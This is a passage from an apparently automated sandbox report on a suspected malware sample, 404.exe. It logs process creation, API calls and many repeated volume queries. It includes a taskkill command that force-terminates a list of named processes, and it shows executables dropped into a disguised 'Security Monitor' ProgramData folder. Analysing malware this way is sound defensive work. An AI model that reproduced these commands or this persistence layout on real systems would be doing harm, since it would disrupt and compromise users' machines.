            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /FJump to behavior
            Source: spkl.exe, 00000033.00000002.3201106110.0000000000A84000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2967766062.00000000044A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: @@DOF_PROGMAN
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_003EEE90 cpuid 65_2_003EEE90
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,51_2_0040AD50
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,51_2_0040A298
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,51_2_033A4CB8
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,51_2_033A4D8A
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: GetLocaleInfoA,51_2_033A9C9C
            Source: C:\Users\user\Desktop\404.exeQueries volume information: C:\Users\user\Desktop\404.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\404.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\404.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\404.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\404.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
